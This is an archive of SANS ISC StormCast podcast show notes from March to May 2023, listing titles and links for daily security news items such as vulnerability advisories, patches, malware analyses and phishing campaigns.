DocuSign Themed Email Leads to Script-Based Infection https://isc.sans.edu/diary/DocuSign-themed%20email%20leads%20to%20script-based%20infection/29888
File Archiver In The Browser https://mrd0x.com/file-archiver-in-the-browser/
Securing PyPI Accounts via Two-Factor Authentication https://blog.pypi.org/posts/2023-05-25-securing-pypi-with-2fa/
Apache Cassandra Vulnerabilities https://lists.apache.org/thread/mwd02nrw2go8shg29rnp3o4hgompvkp5
MOXA MXsecurity Vulnerabilities https://www.moxa.com/en/support/product-support/security-advisory/mxsecurity-command-injection-and-hardcoded-credential-vulnerabilities
5/30/2023, 5 minutes, 50 seconds

ISC StormCast for Friday, May 26th, 2023

IR Case/Alert Management https://isc.sans.edu/diary/IR%20Case%20Alert%20Management/29880
Exploit for CVE-2023-2825 GitLab Vulnerability https://github.com/Occamsec/CVE-2023-2825
Expo Framework OAuth Vulnerability CVE-2023-28131 https://salt.security/blog/a-new-oauth-vulnerability-that-may-impact-hundreds-of-online-services
Mitel MiVoice Vulnerabilities CVE-2023-31457 CVE-2023-32748 https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-23-0004
D-Link Vulnerabilities https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10332
5/26/2023, 5 minutes, 22 seconds

ISC StormCast for Thursday, May 25th, 2023

More Data Enrichment for Cowrie Logs https://isc.sans.edu/diary/More%20Data%20Enrichment%20for%20Cowrie%20Logs/29878
Volt Typhoon: Living off the Land https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF
Android App Breaking Bad https://www.welivesecurity.com/2023/05/23/android-app-breaking-bad-legitimate-screen-recording-file-exfiltration/
Zyxel Updates https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-buffer-overflow-vulnerabilities-of-firewalls
Barracuda Email Security Gateway Vulnerability https://status.barracuda.com/incidents/34kx82j5n4q9
GitLab Patch https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
5/25/2023, 5 minutes, 31 seconds

ISC StormCast for Wednesday, May 24th, 2023

Apache NiFi Scans https://isc.sans.edu/diary/Help+us+figure+this+out+Scans+for+Apache+Nifi/29874/
Samsung Updates Fix 0-Day https://security.samsungmobile.com/securityUpdate.smsb
Lenovo All-In-One Bricked by Windows Update https://www.reddit.com/r/Lenovo/comments/136tatm/lenovo_firmware_10055_bricking_thinkcentre_v53024/
Dell VxRail Security Update https://www.dell.com/support/kbdoc/en-us/000213011/dsa-2023-071-dell-vxrail-security-update-for-multiple-third-party-component-vulnerabilities-7-0-450
BrutePrint: Expose Smartphone Fingerprint Authentication to Brute-force Attack https://arxiv.org/pdf/2305.10791.pdf
5/24/2023, 6 minutes, 18 seconds

ISC StormCast for Tuesday, May 23rd, 2023

Probes for Recent ABUS Security Camera Vulnerability https://isc.sans.edu/diary/Probes%20for%20recent%20ABUS%20Security%20Camera%20Vulnerability%3A%20Attackers%20keep%20an%20eye%20on%20everything./29870
.ZIP Domains Confuse VirusTotal https://twitter.com/imohanasundaram/status/1660678184977805316
Synology DSM 6.2 Patch https://www.synology.com/en-global/security/advisory/Synology_SA_22_25
Jenkins Fixes Multiple Plugin Vulnerabilities https://www.jenkins.io/security/advisory/2023-05-16/
PyPI Suspension Lifted https://status.python.org/incidents/qy2t9mjjcc7g
Nissan Sylphy Classic Key Vulnerability https://vulmon.com/vulnerabilitydetails?qid=CVE-2023-33281
5/23/2023, 5 minutes, 13 seconds

ISC StormCast for Monday, May 22nd, 2023

Another Malicious HTA File Analysis - Part 3 https://isc.sans.edu/forums/diary/Another%20Malicious%20HTA%20File%20Analysis%20-%20Part%203/29678/
When the Phisher Messes Up With Encoding https://isc.sans.edu/diary/When%20the%20Phisher%20Messes%20Up%20With%20Encoding/29864
PyPI Suspends New Users and Projects https://status.python.org/incidents/qy2t9mjjcc7g
PGP Signatures on PyPI: Worse than Useless https://blog.yossarian.net/2023/05/21/PGP-signatures-on-PyPI-worse-than-useless
RATs Found Hiding in the npm Attic https://www.reversinglabs.com/blog/rats-found-hiding-in-the-npm-attic
5/22/2023, 5 minutes, 30 seconds

ISC StormCast for Friday, May 19th, 2023

Apple Updates Everything https://isc.sans.edu/diary/Apple%20Updates%20Everything/29860
A Quick Survey of .zip Domains https://isc.sans.edu/diary/A%20Quick%20Survey%20of%20.zip%20Domains%3A%20Your%20highest%20risk%20is%20running%20into%20Rick%20Astley./29858
Dell NetWorker Security Update https://www.dell.com/support/kbdoc/en-us/000211267/dsa-2023-060-dell-networker-security-update-for-an-nsrcapinfo-vulnerability?lwp=rt
KeePass 2.X Master Password Dumper https://github.com/vdohney/keepass-password-dumper
5/19/2023, 6 minutes, 51 seconds

ISC StormCast for Thursday, May 18th, 2023

Increase in Malicious RAR SFX Files https://isc.sans.edu/forums/diary/Increase%20in%20Malicious%20RAR%20SFX%20files/29852/
FriendlyName Buffer Overflow in Wemo Smart Plug https://sternumiot.com/iot-blog/mini-smart-plug-v2-vulnerability-buffer-overflow/
Wago License Page Exploit https://onekey.com/blog/security-advisory-wago-unauthenticated-remote-command-execution/
Routers Turned Into Proxies https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/
5/18/2023, 5 minutes, 47 seconds

ISC StormCast for Wednesday, May 17th, 2023

Signals Defense With Faraday Bags https://isc.sans.edu/forums/diary/Signals%20Defense%20With%20Faraday%20Bags%20%26%20Flipper%20Zero/29840/
Microsoft SharePoint Scans Password-Protected Files https://infosec.exchange/@threatresearch/110373860063222707
Critical Sandbox Escape Vulnerability in vm2 https://github.com/patriksimek/vm2/security/advisories/GHSA-whpj-8f3w-67p5
Geacon Brings Cobalt Strike Capabilities to macOS Threat Actors https://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/
5/17/2023, 5 minutes, 36 seconds

ISC StormCast for Tuesday, May 16th, 2023

Ongoing Facebook Phishing Campaign Without a Sender and (Almost) Without Links https://isc.sans.edu/diary/Ongoing%20Facebook%20phishing%20campaign%20without%20a%20sender%20and%20%28almost%29%20without%20links/29848
Intel Microcode Updates Do Not Patch Vulnerability https://www.theregister.com/2023/05/15/intel_mystery_microcode/
Fake Trezor Hardware Crypto Wallet https://www.kaspersky.com/blog/fake-trezor-hardware-crypto-wallet/48155/
TP-Link Archer AX-21 Command Injection CVE-2023-1389 Exploited https://www.fortiguard.com/threat-signal-report/5157/tp-link-archer-ax-21-command-injection-vulnerability-cve-2023-1389-exploited-in-the-wild
5/16/2023, 5 minutes, 19 seconds

ISC StormCast for Monday, May 15th, 2023

The .zip gTLD: Risks and Opportunities https://isc.sans.edu/forums/diary/The+zip+gTLD+Risks+and+Opportunities/29838/
Brave Forgetful Browsing https://brave.com/privacy-updates/25-forgetful-browsing/
Intel Mystery Microcode Patch https://www.phoronix.com/news/Intel-12-May-2023-Microcode
Netgear Updates https://kb.netgear.com/000065619/Security-Advisory-for-Multiple-Vulnerabilities-on-the-RAX30-PSV-2022-0348 https://claroty.com/team82/research/chaining-five-vulnerabilities-to-exploit-netgear-nighthawk-rax30-routers-at-pwn2own-toronto-2022
Synology Updates https://www.synology.com/en-global/security/advisory/Synology_SA_23_04
5/15/2023, 7 minutes, 6 seconds

ISC StormCast for Friday, May 12th, 2023

Geolocating IPs is Harder Than You Think https://isc.sans.edu/diary/Geolocating%20IPs%20is%20harder%20than%20you%20think/29834
Pre-Infected Mobile Phones https://www.theregister.com/2023/05/11/bh_asia_mobile_phones/
Dragos Breach https://www.dragos.com/blog/deconstructing-a-cybersecurity-event/
AndoryuBot Targets Ruckus Admin RCE Vulnerability https://www.fortinet.com/blog/threat-research/andoryubot-new-botnet-campaign-targets-ruckus-wireless-admin-remote-code-execution-vulnerability-cve-2023-25717
5/12/2023, 6 minutes, 20 seconds

ISC StormCast for Thursday, May 11th, 2023

Exploratory Data Analysis with CISSM Cyber Attacks Database Part 2 https://isc.sans.edu/diary/Exploratory%20Data%20Analysis%20with%20CISSM%20Cyber%20Attacks%20Database%20-%20Part%202/29828
Microsoft Patched Outlook (Actually Windows) Vulnerability Again https://www.akamai.com/blog/security-research/important-outlook-vulnerability-bypass-windows-api
Law Enforcement and Intelligence Agencies Disable "Snake" Malware https://media.defense.gov/2023/May/09/2003218554/-1/-1/1/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
Fake System Update Drops Malware https://www.malwarebytes.com/blog/threat-intelligence/2023/05/fake-system-update-drops-new-highly-evasive-loader
5/11/2023, 5 minutes, 52 seconds

ISC StormCast for Wednesday, May 10th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20May%202023%20Patch%20Tuesday/29826
GitHub "Push Protection" Now Out of Beta https://github.blog/2023-05-09-push-protection-is-generally-available-and-free-for-all-public-repositories/
5/10/2023, 5 minutes, 57 seconds

ISC StormCast for Tuesday, May 9th, 2023

QR Codes Used in Fake Parking Tickets and Surveys https://www.bleepingcomputer.com/news/security/qr-codes-used-in-fake-parking-tickets-surveys-to-steal-your-money/
Microsoft Edge Update https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnote-stable-channel
Facebook Sees More Fake ChatGPT https://about.fb.com/news/2023/05/metas-q1-2023-security-reports/
CyberGhost VPN Vulnerability https://www.pentestpartners.com/security-blog/bullied-by-bugcrowd-over-kape-cyberghost-disclosure/
5/9/2023, 6 minutes, 21 seconds

ISC StormCast for Monday, May 8th, 2023

Quickly Finding Encoded Payloads in Office Documents https://isc.sans.edu/forums/diary/Quickly+Finding+Encoded+Payloads+in+Office+Documents/29818/
Exploratory Data Analysis with CISSM Cyber Attacks Database Part 1 https://isc.sans.edu/forums/diary/Exploratory+Data+Analysis+with+CISSM+Cyber+Attacks+Database+Part+1/29816/
Guildma is Now Abusing Colorcpl.exe LOLBIN https://isc.sans.edu/forums/diary/Guildma+is+now+abusing+colorcplexe+LOLBIN/29814/
Leaked MSI Keys https://github.com/binarly-io/SupplyChainAttacks/blob/main/MSI/ImpactedDevices.md https://twitter.com/matrosov/status/1654560343295934464
PHP Packages Compromised https://blog.packagist.com/packagist-org-maintainer-account-takeover/
5/8/2023, 6 minutes, 2 seconds

ISC StormCast for Friday, May 5th, 2023

Infostealer Embedded in a Word Document https://isc.sans.edu/diary/Infostealer%20Embedded%20in%20a%20Word%20Document/29810
Cisco SPA-112 Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-spa-unauth-upgrade-UqhyTWW
Fortinet May Updates https://www.fortiguard.com/psirt?date=05-2023
PaperCut Exploitation - A Different Path to Code Execution https://vulncheck.com/blog/papercut-rce
5/5/2023, 6 minutes

ISC StormCast for Thursday, May 4th, 2023

Increased Number of Configuration File Scans https://isc.sans.edu/diary/Increased%20Number%20of%20Configuration%20File%20Scans/29806
Google Enabling Passkeys https://blog.google/technology/safety-security/the-beginning-of-the-end-of-the-password/
Chrome to Drop Lock Icon from HTTPS https://blog.chromium.org/2023/05/an-update-on-lock-icon.html
Attack Against AMD TPM Implementation https://arxiv.org/abs/2304.14717
5/4/2023, 7 minutes, 37 seconds

ISC StormCast for Wednesday, May 3rd, 2023

VBA Project References https://isc.sans.edu/diary/VBA%20Project%20References/29800
BGP Message Parsing Vulnerabilities in FRRouting https://www.forescout.com/blog/three-new-bgp-message-parsing-vulnerabilities-disclosed-in-frrouting-software/
JWT ECDSA Algorithm Confusion https://blog.pentesterlab.com/exploring-algorithm-confusion-attacks-on-jwt-exploiting-ecdsa-23f7ff83390f
5/3/2023, 5 minutes, 49 seconds

ISC StormCast for Tuesday, May 2nd, 2023

"Passive" Analysis of a Phishing Attachment https://isc.sans.edu/diary/%22Passive%22%20analysis%20of%20a%20phishing%20attachment/29798
Apple Rapid Security Response https://www.macrumors.com/2023/05/01/rapid-security-response-16-4-1/
Grafana Security Release https://grafana.com/blog/2023/04/26/grafana-security-release-new-versions-of-grafana-with-security-fixes-for-cve-2023-28119-and-cve-2023-1387/
Illumina Vulnerability https://www.fda.gov/medical-devices/letters-health-care-providers/illumina-cybersecurity-vulnerability-affecting-universal-copy-service-software-may-present-risks
5/2/2023, 5 minutes, 40 seconds

ISC StormCast for Monday, May 1st, 2023

Quick IOC Scan With Docker https://isc.sans.edu/diary/Quick%20IOC%20Scan%20With%20Docker/29788
Deobfuscating Scripts: When Encodings Help https://isc.sans.edu/diary/Deobfuscating%20Scripts%3A%20When%20Encodings%20Help/29792
Hackers Are Breaking Into AT&T Email Accounts To Steal Cryptocurrency https://techcrunch.com/2023/04/26/hackers-are-breaking-into-att-email-accounts-to-steal-cryptocurrency/
Threat Actor Selling New Atomic macOS (AMOS) Stealer on Telegram https://blog.cyble.com/2023/04/26/threat-actor-selling-new-atomic-macos-amos-stealer-on-telegram/
Zyxel Firewall Vulnerability https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-command-injection-vulnerability-of-firewalls
5/1/2023, 5 minutes, 26 seconds

ISC StormCast for Friday, April 28th, 2023

Ransomware Gang Exploiting Unpatched Veeam Backup Products https://www.computerweekly.com/news/365535586/Ransomware-gang-exploiting-unpatched-Veeam-backup-products
Google Authenticator Sync Encryption https://security.googleblog.com/2023/04/google-authenticator-now-supports.html
Keycloak Vulnerability CVE-2023-0264 https://www.offensity.com/en/blog/user-impersonation-via-stolen-uuid-code-in-keycloak-cve-2023-0264/
4/28/2023, 6 minutes, 15 seconds

ISC StormCast for Thursday, April 27th, 2023

Strolling Through Cyberspace and Hunting for Phishing Sites https://isc.sans.edu/diary/Strolling%20through%20Cyberspace%20and%20Hunting%20for%20Phishing%20Sites/29780
RSA Panel: Five Most Dangerous New Attack Techniques https://www.rsaconference.com/usa/agenda/session/The%20Five%20Most%20Dangerous%20New%20Attack%20Techniques
SANS.edu Research Journal https://www.sans.edu/cyber-security-research
4/27/2023, 5 minutes, 45 seconds

ISC StormCast for Wednesday, April 26th, 2023

Calculating CVSS Scores with ChatGPT https://isc.sans.edu/diary/Calculating%20CVSS%20Scores%20with%20ChatGPT/29774
Amplifying SLP Traffic https://www.bitsight.com/blog/new-high-severity-vulnerability-cve-2023-29552-discovered-service-location-protocol-slp
Insecure Default Configuration in Apache Superset https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/
PoC Exploit for Sophos Web Appliance https://github.com/W01fh4cker/CVE-2023-1671-POC
4/26/2023, 6 minutes, 21 seconds

ISC StormCast for Tuesday, April 25th, 2023

AuKill EDR Killer Malware Abuses Process Explorer Driver https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/
PaperCut Vulnerability Deep Dive https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise
SolarWinds Patches https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/solarwinds_platform_2023-2_release_notes.htm
Schneider Electric Update https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2023-101-04&p_enDocType=Security%20and%20Safety%20Notice&p_File_Name=SEVD-2023-101-04.pdf
VirusTotal Code Insight https://blog.virustotal.com/2023/04/introducing-virustotal-code-insight.html
4/25/2023, 6 minutes, 5 seconds

ISC StormCast for Monday, April 24th, 2023

Management of DMARC Control for Email Impersonation of Domains in the .co TLD https://isc.sans.edu/forums/diary/Management+of+DMARC+control+for+email+impersonation+of+domains+in+the+co+TLD+part+1/29768/
X_Trader Supply Chain Attack Fallout https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain
Car Hacking with Old Nokia Phones https://www.vice.com/en/article/v7beyj/car-thieves-tech-hidden-old-nokia-phones-bluetooth-speakers-emergency-engine-start-keyless
Dog Hunt: Finding Decoy Dog Toolkit https://blogs.infoblox.com/cyber-threat-intelligence/cyber-threat-advisory/dog-hunt-finding-decoy-dog-toolkit-via-anomalous-dns-traffic/
4/24/2023, 5 minutes, 45 seconds
Episode Artwork

ISC StormCast for Friday, April 21st, 2023

Taking a Bite Out of Password Expiry Helpdesk Calls https://isc.sans.edu/diary/Taking%20a%20Bite%20Out%20of%20Password%20Expiry%20Helpdesk%20Calls/29758 3CX Software Supply Chain Compromise https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise Google Ghost Tokens https://astrix.security/ghosttoken-exploiting-gcp-application-infrastructure-to-create-invisible-unremovable-trojan-app-on-google-accounts/ PyPi Trusted Publishers https://blog.pypi.org/posts/2023-04-20-introducing-trusted-publishers/
4/21/2023, 6 minutes, 35 seconds

ISC StormCast for Thursday, April 20th, 2023

Yet Another Google Chrome 0-Day https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_18.html Oracle Critical Patch Update April 2023 https://www.oracle.com/security-alerts/cpuapr2023.html Github Provenance Action for npm Packages https://www.theregister.com/2023/04/19/github_actions_npm_origins/ Microsoft Revises Threat Actor Naming https://learn.microsoft.com/de-de/microsoft-365/security/intelligence/microsoft-threat-actor-naming
4/20/2023, 4 minutes, 49 seconds

ISC StormCast for Wednesday, April 19th, 2023

UDDIs Are Back: Attackers Rediscovering Old Exploits. https://isc.sans.edu/diary/UDDIs%20are%20back%3F%20Attackers%20rediscovering%20old%20exploits./29754 Russian Attacks against Routers https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-108 Information Leakage on Discarded Routers https://www.welivesecurity.com/2023/04/18/discarded-not-destroyed-old-routers-reveal-corporate-secrets/
4/19/2023, 5 minutes, 22 seconds

ISC StormCast for Tuesday, April 18th, 2023

The strange case of the Great Honeypot of China https://isc.sans.edu/diary/The%20strange%20case%20of%20Great%20honeypot%20of%20China/29750 The LockBit ransomware (kinda) comes for macOS https://objective-see.org/blog/blog_0x75.html Google Cloud Used as C&C https://thehackernews.com/2023/04/google-uncovers-apt41s-use-of-open.html
4/18/2023, 5 minutes, 23 seconds

ISC StormCast for Monday, April 17th, 2023

Attack Campaign That Uses Fake Google Chrome Errors https://insight-jp.nttsecurity.com/post/102icvb/attack-campaign-that-uses-fake-google-chrome-error-to-distribute-malware-from-com Chromium Publishes Emergency Update https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html LAPS Update Errors https://learn.microsoft.com/en-us/windows-server/identity/laps/laps-overview Manage Engine Vulnerability https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/
4/17/2023, 5 minutes, 25 seconds

ISC StormCast for Friday, April 14th, 2023

HTTP: What's Left of it and the OCSP Problem https://isc.sans.edu/diary/HTTP%3A%20What%27s%20Left%20of%20it%20and%20the%20OCSP%20Problem/29744 NTP Vulnerability Update https://github.com/spwpun/ntp-4.2.8p15-cves/issues/1#issuecomment-1506667321 SecurePoint UTM Vulnerability CVE-2023-22897 https://www.rcesecurity.com/2023/04/securepwn-part-1-bypassing-securepoint-utms-authentication-cve-2023-22620/ https://www.rcesecurity.com/2023/04/securepwn-part-2-leaking-remote-memory-contents-cve-2023-22897/ Google Cloud Assured Open Source Software Services https://cloud.google.com/blog/products/identity-security/google-cloud-assured-open-source-software-service-now-ga
4/14/2023, 6 minutes, 29 seconds

ISC StormCast for Thursday, April 13th, 2023

Recent IcedID (Bokbot) activity https://isc.sans.edu/forums/diary/Recent%20IcedID%20%28Bokbot%29%20activity/29740/ Microsoft Message Queue Vulnerabilities Details https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/ NTP Vulnerabilities https://github.com/spwpun/ntp-4.2.8p15-cves https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-0938
4/13/2023, 6 minutes, 20 seconds

ISC StormCast for Wednesday, April 12th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20April%202023%20Patch%20Tuesday/29736 Windows LAPS Available as part of Windows https://techcommunity.microsoft.com/t5/windows-it-pro-blog/by-popular-demand-windows-laps-available-now/ba-p/3788747 SAP Patches https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Adobe Patches https://helpx.adobe.com/security/security-bulletin.html
4/12/2023, 6 minutes, 3 seconds

ISC StormCast for Tuesday, April 11th, 2023

Another Malicious HTA File Analysis - Part 2 https://isc.sans.edu/diary/Another%20Malicious%20HTA%20File%20Analysis%20-%20Part%202/29676 Apple Updates for Older Operating Systems https://support.apple.com/en-us/HT201222 MSI Attack May Affect BIOS Updates https://www.msi.com/news/detail/MSI-Statement-141688 KB5021130: How to manage the Netlogon protocol changes related to CVE-2022-38023 https://support.microsoft.com/en-us/topic/kb5021130-how-to-manage-the-netlogon-protocol-changes-related-to-cve-2022-38023-46ea3067-3989-4d40-963c-680fd9e8ee25
4/11/2023, 5 minutes, 39 seconds

ISC StormCast for Monday, April 10th, 2023

Detecting Suspicious API Usage with YARA Rules https://isc.sans.edu/diary/Detecting%20Suspicious%20API%20Usage%20with%20YARA%20Rules/29724 Apple Patching Two 0-Day Vulnerabilities in iOS and macOS https://isc.sans.edu/diary/Apple%20Patching%20Two%200-Day%20Vulnerabilities%20in%20iOS%20and%20macOS/29726 VM2 Sandbox Escape https://github.com/patriksimek/vm2/security/advisories/GHSA-7jxr-cg7f-gpgv https://gist.github.com/seongil-wi/2a44e082001b959bfe304b62121fb76d Microsoft Netlogon: Potential Upcoming Impacts of CVE-2022-38023 https://isc.sans.edu/diary/Microsoft%20Netlogon%3A%20Potential%20Upcoming%20Impacts%20of%20CVE-2022-38023/29728
4/10/2023, 6 minutes, 55 seconds

ISC StormCast for Friday, April 7th, 2023

Self Extracting Archives https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/ loldrivers https://www.loldrivers.io Trellix Privilege Escalation https://kcm.trellix.com/corporate/index?page=content&id=SB10396 HP LaserJet Vuln. https://support.hp.com/us-en/document/ish_7905330-7905358-16/hpsbpi03838
4/7/2023, 6 minutes, 37 seconds

ISC StormCast for Thursday, April 6th, 2023

Exploration of DShield Cowrie Data with jq https://isc.sans.edu/diary/Exploration%20of%20DShield%20Cowrie%20Data%20with%20jq/29714 NEXX Garage Door Vulnerability https://medium.com/@samsabetan/the-uninvited-guest-idors-garage-doors-and-stolen-secrets-e4b49e02dadc OneNote Changes https://learn.microsoft.com/en-us/deployoffice/security/onenote-extension-block MSFT Changes to Auto-Update https://learn.microsoft.com/en-us/windows/release-health/windows-message-center#3060 NPM Spam DDoS Attacks https://www.helpnetsecurity.com/2023/04/05/flood-of-malicious-packages-results-in-npm-registry-dos/
4/6/2023, 6 minutes, 52 seconds

ISC StormCast for Wednesday, April 5th, 2023

Analyzing the efile.com Malware https://isc.sans.edu/diary/Analyzing+the+efilecom+Malware+efail/29712 ALPHV Ransomware Targets Backup Installations https://www.mandiant.com/resources/blog/alphv-ransomware-backup Sophos Web Appliance Vulnerability (and EoL) https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce Zimbra Exploited in Targeted Attacks https://www.proofpoint.com/us/blog/threat-insight/exploitation-dish-best-served-cold-winter-vivern-uses-known-zimbra-vulnerability
4/5/2023, 6 minutes, 18 seconds

ISC StormCast for Tuesday, April 4th, 2023

efile.com compromise https://isc.sans.edu/forums/diary/Supply%20Chain%20Compromise%20or%20False%20Positive%3A%20The%20Intriguing%20Case%20of%20efile.com%20%5Bupdated%20-%20confirmed%20malicious%20code%5D/29708/ Western Digital MyCloud Breach https://www.bleepingcomputer.com/news/security/western-digital-discloses-network-breach-my-cloud-service-down/ 3CX Compromise Affected Cryptocoin Exchanges https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/
4/4/2023, 7 minutes, 46 seconds

ISC StormCast for Monday, April 3rd, 2023

Use of X-Frame-Options and CSP frame-ancestors security headers https://isc.sans.edu/diary/Use%20of%20X-Frame-Options%20and%20CSP%20frame-ancestors%20security%20headers%20on%201%20million%20most%20popular%20domains/29698 oledump supporting MSI Files https://isc.sans.edu/diary/Update+oledump+MSI+Files/29700/ 3CX Update https://www.3cx.com/blog/news/chrome-blocks-latest-msi/ PinDuoDuo App shows anomalous behaviour https://edition.cnn.com/2023/04/02/tech/china-pinduoduo-malware-cybersecurity-analysis-intl-hnk/index.html
4/3/2023, 5 minutes, 57 seconds

ISC StormCast for Friday, March 31st, 2023

Malicious 3CX Desktop App Update Livestream (Friday March 31st 1400 ET, 1800 UTC) https://www.youtube.com/watch?v=cCf3Km_j5bY 3CX Update: https://www.3cx.com/blog/news/desktopapp-security-alert/ SentinelOne: https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/ Objective-See Blog Post: https://objective-see.org/blog/blog_0x73.html Crowdstrike: https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/ Bypassing PowerShell Strong Obfuscation https://isc.sans.edu/diary/Bypassing%20PowerShell%20Strong%20Obfuscation/29692
3/31/2023, 6 minutes, 10 seconds

ISC StormCast for Thursday, March 30th, 2023

Extracting Multiple Streams From OLE Files https://isc.sans.edu/diary/Extracting%20Multiple%20Streams%20From%20OLE%20Files/29688 3CXDesktop App Compromise https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/ Microsoft Defender False Positives https://twitter.com/MSFT365Status/status/1641048649525260289 https://admin.microsoft.com/Adminportal/Home?ref=/servicehealth/:/alerts/DZ534539 (requires login) Active Exploitation of IBM Aspera Faspex CVE-2022-47986 https://www.rapid7.com/blog/post/2023/03/28/etr-active-exploitation-of-ibm-aspera-faspex-cve-2022-47986/ QNAP Patch for sudo vulnerability https://www.qnap.com/en/security-advisory/qsa-23-11
3/30/2023, 5 minutes, 29 seconds

ISC StormCast for Wednesday, March 29th, 2023

Network Data Collector Placement Makes a Difference https://isc.sans.edu/diary/Network%20Data%20Collector%20Placement%20Makes%20a%20Difference/29664 Throttling and Blocking Email from Persistently Vulnerable Exchange Servers to Exchange Online https://techcommunity.microsoft.com/t5/exchange-team-blog/throttling-and-blocking-email-from-persistently-vulnerable/ba-p/3762078 Bypassing Wi-Fi Encryption by Manipulating Transmit Queues https://papers.mathyvanhoef.com/usenix2023-wifi.pdf
3/29/2023, 5 minutes, 17 seconds

ISC StormCast for Tuesday, March 28th, 2023

Another Malicious HTA File Analysis Part 1 https://isc.sans.edu/diary/Another%20Malicious%20HTA%20File%20Analysis%20-%20Part%201/29674 Apple Updates Everything https://isc.sans.edu/diary/Apple%20Updates%20Everything%20%28including%20Studio%20Display%29/29682 MacStealer Malware Exfiltrates Mac Secrets https://www.uptycs.com/blog/macstealer-command-and-control-c2-malware
3/28/2023, 5 minutes, 13 seconds

ISC StormCast for Monday, March 27th, 2023

Update for Windows Snipping Tool https://isc.sans.edu/diary/Microsoft%20Released%20an%20Update%20for%20Windows%20Snipping%20Tool%20Vulnerability/29670 GitHub Rotates SSH Keys https://github.blog/2023-03-23-we-updated-our-rsa-ssh-host-key/ redis-py vulnerability leads to mixed up sessions, affects ChatGPT https://openai.com/blog/march-20-chatgpt-outage Linus Tech Tips YouTube Hack https://www.theverge.com/2023/3/23/23653115/linus-tech-tips-youtube-hack-crypto-scam https://isc.sans.edu/diary/Elon%20Musk%20Themed%20Crypto%20Scams%20Flooding%20YouTube%20Today/29434 CyberChef Update https://github.com/gchq/CyberChef/wiki/Character-encoding,-EOL-separators,-and-editor-features
3/27/2023, 4 minutes, 59 seconds

ISC StormCast for Friday, March 24th, 2023

Cropping and Redacting Images Safely https://isc.sans.edu/diary/Cropping%20and%20Redacting%20Images%20Safely/29666 Untitled Goose Tool https://github.com/cisagov/untitledgoosetool Veeam Vulnerability Details https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/ Unicode Support in Python used to Evade Detection https://blog.phylum.io/malicious-actors-use-unicode-support-in-python-to-evade-detection
3/24/2023, 5 minutes, 39 seconds

ISC StormCast for Thursday, March 23rd, 2023

Windows Snipping Tool Privacy Bug: Inspecting PNG Files https://isc.sans.edu/diary/Windows%2011%20Snipping%20Tool%20Privacy%20Bug%3A%20Inspecting%20PNG%20Files/29660 Acropalypse Detection and Sanitization Tools https://github.com/infobyte/CVE-2023-21036 WooCommerce Skimmer Reveals Tampered Gateway Plugin https://blog.sucuri.net/2023/03/woocommerce-skimmer-reveals-tampered-gateway-plugin.html Netgear Orbi Router Vulnerable https://blog.talosintelligence.com/vulnerability-spotlight-netgear-orbi-router-vulnerable-to-arbitrary-command-execution/
3/23/2023, 5 minutes, 43 seconds

ISC StormCast for Wednesday, March 22nd, 2023

String Obfuscation: Character Pair Reversal https://isc.sans.edu/diary/String%20Obfuscation%3A%20Character%20Pair%20Reversal/29654 Windows 11 Snipping Tool Privacy Bug https://www.bleepingcomputer.com/news/microsoft/windows-11-snipping-tool-privacy-bug-exposes-cropped-image-content/ Malicious .Net Packages https://jfrog.com/blog/attackers-are-starting-to-target-net-developers-with-malicious-code-nuget-packages/ Spring Framework Vulnerability https://spring.io/blog/2023/03/20/spring-framework-6-0-7-and-5-3-26-fix-cve-2023-20860-and-cve-2023-20861 Snappy Vulnerability https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc
3/22/2023, 5 minutes, 54 seconds

ISC StormCast for Tuesday, March 21st, 2023

From Phishing Kit to Telegram ... or Not https://isc.sans.edu/diary/From%20Phishing%20Kit%20To%20Telegram...%20or%20Not!/29650 Emotet uses OneNote https://cofense.com/blog/emotet-sending-malicious-emails-after-three-month-hiatus/ WSUS Update https://learn.microsoft.com/en-us/windows-server/administration/windows-server-update-services/plan/plan-your-wsus-deployment#uup-considerations DOTRUNPEX .Net Injector https://research.checkpoint.com/2023/dotrunpex-demystifying-new-virtualized-net-injector-used-in-the-wild/
